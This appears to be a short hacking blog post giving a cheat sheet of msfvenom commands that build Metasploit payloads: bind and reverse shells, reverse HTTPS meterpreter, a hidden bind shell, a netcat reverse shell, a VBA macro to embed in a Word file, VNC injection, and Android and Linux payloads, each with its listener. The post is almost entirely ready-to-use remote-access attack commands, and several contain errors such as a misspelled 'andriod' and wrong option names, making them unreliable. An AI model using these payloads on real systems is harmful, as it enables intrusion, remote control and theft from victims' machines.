Popular Metasploit Payloads


Bind shell
msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe
setup a listener > use exploit/multi/handler

Reverse TCP Payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe
setup a listener > use exploit/multi/handler

HTTPS Payload
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe
setup a listener > use exploit/multi/handler

Hidden Bind TCP Payload
msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe
Listen with netcat > nc 192.168.0.100 1010

Reverse Shell Payload with Netcat
msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.107 lport=1111-f exe > /root/Desktop/ncshell.exe
Listen with netcat > nc -lvp 1111

Macro Payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba
Embed that macro code on a word file
setup a listener > use exploit/multi/handler

VNC Payload
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe
setup a listener > use exploit/multi/handler

Android Payload
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk
setup a listener > use exploit/multi/handler

Linux Payload
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell
setup a listener > use exploit/multi/handler



Popular Metasploit Payloads Popular Metasploit Payloads Reviewed by Haxbaba Tech on 21:39 Rating: 5

No comments:

Powered by Blogger.